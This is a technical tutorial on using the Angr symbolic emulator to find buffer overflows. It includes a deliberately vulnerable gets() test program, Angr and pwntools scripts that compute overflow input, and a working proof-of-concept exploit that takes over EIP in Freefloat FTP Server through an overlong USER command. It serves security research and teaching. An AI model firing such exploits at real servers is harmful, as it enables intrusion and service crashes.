Coding

Vicious exploitation. Searching for buffer overflow vulnerabilities with Angr

Angr, a powerful symbolic emulator, makes it possible to seize control over execution of someone else’s code; all you have to do is specify the search direction. Today you will learn how to find similar holes in applications using Angr; in addition, you will write an inline function analyzer and create an operable exploit for a real-life FTP server.

info

More information about Angr can be found in my previous article: Anger management. Welcome to Angr, a symbolic emulation framework.

Unconstrained

Let’s write and build a test object: a small program a priori vulnerable to buffer overflow. Build flags ensure a static ImageBase and the absence of a stack canary, which makes hacker’s life much easier.

// gcc exp2.c -m32 -fno-stack-protector -no-pie -o exp2_32
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void win()
{
printf("Win!\n");
}
void func(int key)
{
char buf[32];
printf("overflow me : ");
gets(buf);
}
int main(int argc, char* argv[])
{
func(1);
return 0;
}

The code stores the input string in a local buffer. Your task is to overflow this buffer in a way that transfers the control flow to the win function.

08049196 int32_t win()
080491b3 e8b8feffff call puts
080491c1 char* func()
080491c1 55 push ebp {__saved_ebp}
080491c2 89e5 mov ebp, esp {__saved_ebp}
080491c4 53 push ebx {__saved_ebx}
080491c5 83ec24 sub esp, 0x24
080491e8 8d45d8 lea eax, [ebp-0x28 {buf}]
080491eb 50 push eax {buf} {var_3c}
080491ec e86ffeffff call gets
080491f8 c9 leave {__saved_ebp}
080491f9 c3 retn {__return_addr}
080491fa int32_t main(int32_t argc, char** argv, char** envp)
08049218 68efbeadde push 0x1
0804921d e89fffffff call func
08049222 83c410 add esp, 0x10

Let’s find out the actual addresses using a debugger. At the entry point of the func() function, the return address is on top of the stack. The prologue saves the old EBP on the stack and then subtracts 0x24 from ESP, thus, creating a ‘pocket’ for local data on the stack.

0xffffd6a0: 00 00 00 00 # buf
# (...) local variables
0xffffd6c4: 00 80 f9 f7 # old EBX
0xffffd6c8: e8 d6 ff ff # old EBP
0xffffd6cc: 22 92 04 08 # ret addr -> 0x08049222

The stack looks quite conventionally. Let’s try to override the return address.

import angr
import claripy
project = angr.Project('exp2_32', auto_load_libs=False)
symbolic_input = claripy.BVS("input", 48 * 8)
initial_state = project.factory.entry_state(stdin=symbolic_input, args=['./a.out'])
initial_state.options.add('SYMBOL_FILL_UNCONSTRAINED_MEMORY')
initial_state.options.add('SYMBOL_FILL_UNCONSTRAINED_REGISTERS')
def is_fully_symbolic_pc(state):
for i in range(state.arch.bits):
if not state.solver.symbolic(state.regs.pc[i]):
return False
return True
simulation = project.factory.simgr(
initial_state,
save_unconstrained=True,
stashes={
'active' : [initial_state],
'unconstrained' : [],
'found' : [],
'not_needed' : []
}
)
def is_successful(state):
return simulation.unconstrained
simulation.explore(find=is_successful)
solution_state = simulation.unconstrained[0]
if is_fully_symbolic_pc(solution_state):
solution_state.add_constraints(solution_state.regs.eip == 0x8049196)
solution = solution_state.solver.eval(symbolic_input,cast_to=bytes)
print('input:', solution)

The script searches for such input data that will transfer control to address 0x8049196. How does it work? You start the simulation and wait for the unconstrained box to be filled. It contains states with more than 256 possible destination addresses the control flow can be transferred to. In most cases, this means that the EIP register partially or completely depends on symbolic variables under your control. Just in case, you can check whether each bit of the EIP register is symbolic. Then you set a constraint: the register must be equal to a certain value. After that, you start concretization of solutions.

input: b’\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\x91\x04\x08′

First of all, let’s check whether everything works properly. Pwntools can be used for this purpose:

from pwn import *
p = process('./exp2_32')
buff = b'\x00' * 44 + b'\x96\x91\x04\x08'
p.sendline(buff)
print(p.recv())

Getting the much-anticipated result:

$ python test_exp2.py

[+] Starting local process ‘./exp2_32’: pid 9178

b’overflow me : Win!\n’

[*] Stopped process ‘./exp2_32’ (pid 9178)

Writing VEX analyzer

Overflows frequently occur in functions like strcpy. If they are imported from external libraries, it’s not a big deal to find them and check their usage manually. However, optimizing compilers often replace them with inline versions.

If the compiler is popular and widespread, IDA Pro will find strcpy by Flirt signatures. But if you change a few compiler flags or use an unfamiliar version, IDA becomes blind. Let’s write a universal solution applicable to any compiler, regardless of processor architecture and build flags.

The strcpy function is often implemented as memcpy with strlen performing preliminary string length calculation. But optimized (e.g. in Visual Studio) versions are also available:

@loop:
mov cl, byte [eax]
lea eax, [eax+0x1]
mov byte [edx+eax-0x1], cl
test cl, cl
jne @loop

As can be seen, the code performs three operations:

  • read a byte at a certain address;
  • write the received byte to another address; and 
  • return control to the beginning of the loop.

Each operation represents a primitive (i.e. an indivisible logical block that can be found in VEX code) First, let’s find a loop and then check whether it contains a read operation followed by a write operation applied to the read bytes.

import angr
path = 'bin/vs2017'
proj = angr.Project(path, auto_load_libs=False)
bin_cfg = proj.analyses.CFGFast(force_complete_scan=False)
def get_exits(block):
node = bin_cfg.get_any_node(block.addr)
return [x.addr for x in node.successors]
def print_node(block):
for x in block.vex.constant_jump_targets:
print(hex(block.addr), hex(x))
def is_cycled_node(block):
return block.addr in get_exits(block)
def is_load_byte(s):
if s.tag == 'Ist_WrTmp':
if s.data.tag == 'Iex_Load':
if s.data.type == 'Ity_I8':
return True
def is_store_byte(s):
if s.tag == 'Ist_Store':
if s.data.tag == 'Iex_RdTmp':
return True
def is_memcpy_node(block):
tmp_ids = []
for s in block.vex.statements:
if is_load_byte(s):
tmp_ids.append(s.tmp)
continue
if is_store_byte(s):
if tmp_ids:
if s.data.tmp in tmp_ids:
return True
print('Analyse:', path)
nodes_addr = [x.addr for x in bin_cfg.nodes_iter()]
for addr in nodes_addr:
block = proj.factory.block(addr)
if is_cycled_node(block):
if is_memcpy_node(block):
block.pp()

In Angr, a basic block is a piece of code located before the command that transfers control. The algorithm is as follows: you analyze each block found by CFGFast; then you check whether the block has an exit that transfers the control flow to its own beginning (a primitive loop); after that, you analyze the VEX code by listing all commands inside the block; next, you find the read operation and remember the variable where the data are placed; and finally, you find the write operation and check where the same variable is used both in the read and write operations.

Importantly: you are looking for a read operation applied to one byte by specifying the data type as Ity_I8. By changing the size, you can filter out other loop implementations. But for the sake of simplicity, let’s stop there. Time to apply the script to a file with memcpy compiled in Visual Studio.

Analyse: bin/vs2017

401160 mov cl, byte ptr [esp+eax+0x68]
401164 lea eax, [eax+0x1]
401167 mov byte ptr [esp+eax-0x1], cl
40116b test cl, cl
40116d jne 0x401160

Experiments with other files bring additional variants.

402f6c rep movsb byte ptr es:[edi], byte ptr [esi]

4022a7 rep movsd dword ptr es:[edi], dword ptr [esi]

100093e4 mov al, byte ptr [edi+esi]
100093e7 mov byte ptr [esi], al
100093e9 inc esi
100093ea sub ecx, 0x1
100093ed jne 0x100093e4

100069c1 mov edx, dword ptr [esi]
100069c3 mov dword ptr [edi], edx
100069c5 lea esi, [esi+0x4]
100069c8 lea edi, [edi+0x4]
100069cb dec eax
100069cc jne 0x100069c1

100069b3 mov dl, byte ptr [esi]
100069b5 mov byte ptr [edi], dl
100069b7 inc esi
100069b8 inc edi
100069b9 dec ecx
100069ba jne 0x100069b3

1000c270 mov al, byte ptr [esi+edx]
1000c273 mov byte ptr [ebp+edx-0xc], al
1000c277 inc edx
1000c278 cmp edx, ecx
1000c27a jl 0x1000c270

1000687c sub edi, 0x4
1000687f sub esi, 0x4
10006882 mov eax, dword ptr [esi]
10006884 mov dword ptr [edi], eax
10006886 sub ecx, 0x4
10006889 test ecx, 0xfffffffc
1000688f jne 0x1000687c

10006851 sub esi, 0x20
10006854 sub edi, 0x20
10006857 movdqu xmm0, xmmword ptr [esi]
1000685b movdqu xmm1, xmmword ptr [esi+0x10]
10006860 movdqu xmmword ptr [edi], xmm0
10006864 movdqu xmmword ptr [edi+0x10], xmm1
10006869 sub ecx, 0x20
1000686c test ecx, 0xffffffe0
10006872 jne 0x10006851

In my humble opinion, the result is quite decent. You can find not only inline functions, but also makeshift memcpy functions that often contain implementation errors.

Attacking an application

I am going to use Freefloat FTP Server (zip) as a target; this is a classic example used by novice hackers programmers to polish their buffer overflow skills. Objectively, the easiest way to crash it is to write a protocol fuzzer. But I found it interesting and instructive to do this in a new way.

Debugging difficult cases

The first thing you can do is enable debug messages:

import logging
logging.getLogger('angr').setLevel('DEBUG')

In addition, some state flags (e.g. TRACK_MEMORY_ACTIONS) add debug messages to state.history.actions.

But I recommend debugging in PyCharm: it enables you to look inside Angr in the course of execution, which is really helpful.

You cannot start emulation from the very beginning of the program since it would take huge amounts of memory and time. First, you have to choose an entry point. The moment when the data are received (i.e. WS2_32.recv) seems to be the ideal variant.

When you go two calls deeper into the IDA pseudocode, you see the function that parses the input at 0x402190. This is a class method, and the structure with all its data is passed to this class via ECX. I reconstructed it in IDA:

struct __fixed struct_ecx // sizeof=0x634
{
__int32 SOCKET;
__int32 PORT;
__int32 CLIENT_PORT; // 0
__int32 field_C; // 0
__int32 field_10; // 0
char *INPUT_ptr_1024; // XREF: build_input_str+8/r
// parse_input_str+11/r
__int32 INPUT_end; // XREF: build_input_str+5/r
char str_USERNAME_a[128] __strlit(C,"UTF-8");
char str_PASSWORD_a[128] __strlit(C,"UTF-8");
char str_answer_w[260] __strlit(C,"UTF-8");
char not_used[260] __strlit(C,"UTF-8");
char str_answer_2_w[520] __strlit(C,"UTF-8");
char str_answer_a[260] __strlit(C,"UTF-8");
__int32 IS_TYPE_I; // set to 1 in INIT
};

The code that fills out the initial structure can be found at the very beginning of the thread. Using the New operator, memory for it is allocated from the heap; then a second buffer 1024 bytes in size is allocated there; and a reference to it is placed inside the structure in INPUT_ptr_1024.

Your objective is to simulate the creation of this structure using your own code:

import angr
path = 'bin/FTPServer.exe'
project = angr.Project(path, auto_load_libs=False)
EIP_START = 0x402190
initial_state = project.factory.blank_state(addr=EIP_START)
initial_state.options.add('ZERO_FILL_UNCONSTRAINED_MEMORY')
initial_state.options.add('ZERO_FILL_UNCONSTRAINED_REGISTERS')
FAKE_INPUT_ADDR = 0x38000
FAKE_STRUCT_ADDR = 0x39000
FAKE_STRUCT_SIZE = 0x10000
bvs_input = initial_state.solver.BVS("bvs_input", 8*1024)
initial_state.memory.store(FAKE_STRUCT_ADDR, b'\x00' * FAKE_STRUCT_SIZE, FAKE_STRUCT_SIZE)
initial_state.memory.store(FAKE_INPUT_ADDR, bvs_input)
angr.types.register_types(angr.types.parse_type('struct ftp_this { char unknown[0x14]; char * str_ptr; }'))
initial_state.mem[FAKE_STRUCT_ADDR].struct.ftp_this.str_ptr = FAKE_INPUT_ADDR
initial_state.regs.ecx = FAKE_STRUCT_ADDR

You create a new state at the entry of the parser. Then you ask Angr to fill uninitialized registers and memory areas with zeros. After that, you create a symbolic variable and substitute the input string with it. Angr supports interaction with structures; so, you can use them to write str_ptr.

step_count = 0
def next_step(sim_mngr):
global step_count
active = sim_mngr.stashes['active']
print(f'\nstep_count: {step_count}, active: {len(active)}')
step_count += 1
simulation = project.factory.simgr(initial_state)
simulation.explore(step_func=next_step)

If you run a test simulation, you’ll see that the number of active states quickly becomes greater than 300 (not to mention 8 gigabytes of RAM consumed by this process).

Avoiding path explosion

Let’s examine a possible implementation of strcpy:

while((*dst_ptr++ = *src_ptr++) != '\0');

Everything is simple when you are dealing with specific values, but if the string src_ptr is symbolic, then a fork occurs at each step of copying: exit the loop or go through another round.

Standard path searching will create two states for each iteration. In other words, to successfully ‘copy’ a symbolic string 128 bytes in size, 256 possible paths are required, and 255 of them lead to wrong places. And if the string is subsequently copied a few more times, then the number of possible paths increases to 2563!

Therefore, if you use standard path searching, it would take forever to create a complete copy of a long string. Let’s write a selection algorithm that goes through cycles to a specified limit without transferring control before the due time.

class LoopHolder:
def __init__(self, max_depth=15):
self.max_depth = max_depth
def _is_loop(self, state, item):
block_size = state.block().size
return (item.addr >= state.addr) and (item.addr < state.addr+block_size)
def _get_loop_in_list(self, state, succ_list):
for item in succ_list:
if self._is_loop(state, item):
return item
def _count_prev_iter(self, state):
count = 0
for item in reversed(state.history.bbl_addrs):
if item == state.addr:
count += 1
else:
break
return count
def _process_loop(self, state, succ_list):
next_loop = self._get_loop_in_list(state, succ_list)
if not next_loop: return succ_list
prev_count = self._count_prev_iter(next_loop)
if prev_count:
if prev_count >= self.max_depth:
succ_list.remove(next_loop)
return succ_list
else:
return [next_loop]
else:
return [next_loop]
def _filter_succ(self, state, succ_list):
if len(succ_list) == 1:
return succ_list
if len(succ_list) > 1:
return self._process_loop(state, succ_list[:])
return []
def _remove_old_state(self, sim_succ, old_active):
for item in old_active:
sim_succ.successors.remove(item)
sim_succ.flat_successors.remove(item)
sim_succ.all_successors.remove(item)
def _add_new_state(self, sim_succ, new_active):
sim_succ.successors += new_active
sim_succ.flat_successors += new_active
sim_succ.all_successors += new_active
def replace_succ(self, state, sim_succ):
active = sim_succ.successors[:]
if active:
new_active = self._filter_succ(state, active)
self._remove_old_state(sim_succ, active)
self._add_new_state(sim_succ, new_active)
return sim_succ

Angr makes it possible to replace almost any part of built-in algorithms with your own ones; in this particular case, let’s replace the successors function. It takes a specific state and returns addresses where the control flow will be transferred next.

loop_filter = LoopHolder(300)
unconstrained_state = None
def successor_func(state, **run_args):
old_succ = state.project.factory.successors(state, **run_args)
if old_succ.unconstrained_successors:
global unconstrained_state
unconstrained_state = old_succ.unconstrained_successors[0]
return loop_filter.replace_succ(state, old_succ)
simulation = project.factory.simgr(initial_state)
simulation.explore(successor_func=successor_func)

The algorithm detects the presence of a loop and counts the number of iterations: if their number has reached the maximum depth, it exits; if the number of iterations is less, it continues running the loop.

Also, let’s substitute successor_func to remember the found unconstrained state: you won’t be able to find it in another place.

Configuring libc

If a function of the strlen type is taken from an external import, it will be replaced by a stub.

project.hook(0x403d70, angr.SIM_PROCEDURES['libc']['strncmp']())

In such a case, a different symbolic variable concretization strategy is used:

state.libc.buf_symbolic_bytes = 256
state.libc.max_str_len = 256

The exact size of the string is configured in the emulator state! I spent several days on debugging before making this discovery, and now I’m sharing it with you to save your time.

Reducing the number of states

simulation = project.factory.simgr(initial_state)
simulation.explore(successor_func=successor_func, find=0x402212)
state = simulation.found[0]
simulation2 = project.factory.simgr(state)
simulation2.explore(successor_func=successor_func)

The next step towards optimization is to limit the number of states to be examined. There are several branches inside the parser; each of them checks its own command: first QUIT, then USER, and so on. There is no point in going through all the commands simultaneously; instead, it’s better to perform a deep emulation of each command separately. First of all, let’s find the state at address 0x402212: it corresponds to the USER command branch.

Then you continue emulation without a specific goal. But if everything goes according to the plan, then at the end of the emulation (i.e. when all states reach ret of the first function), you’ll find unconstrained_state:

EIP_GOAL = 0x44444444 # 'DDDD'
if unconstrained_state:
state = unconstrained_state
if state and is_fully_symbolic_pc(state):
state.add_constraints(state.regs.eip == EIP_GOAL)
solution = state.solver.eval(bvs_input, cast_to=bytes)
print('bvs_input:', solution.rstrip(b"\x00"))

The code displays the input string that will enable you to seize control over execution.

bvs_input: b’USER \x01\x01 (…) DDDD (…)’

Testing the exploit

Running the script:

from pwn import *
exploit = b'USER ' + b'\x01' * 230 + b'DDDD' + b'\r\n'
conn = remote('127.0.0.1', 21)
conn.recvline()
conn.send(exploit)
conn.recvuntil(b' ', drop=True)
conn.recvline()
conn.close()

It connects to the FTP server and crashes it. Congrats!

it? Share: